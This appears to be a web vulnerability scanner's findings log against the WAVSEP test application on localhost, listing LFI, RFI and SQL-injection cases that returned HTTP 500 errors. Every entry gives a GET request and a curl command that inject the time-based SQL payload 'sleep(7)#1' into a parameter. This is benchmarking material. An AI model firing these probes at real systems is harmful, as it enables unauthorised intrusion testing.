Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=sleep%287%29%231&password=textvalue2"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=sleep%287%29%231&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=sleep%287%29%231&password=textvalue2"
Solutions
More information about the error should be found in the server logs.
References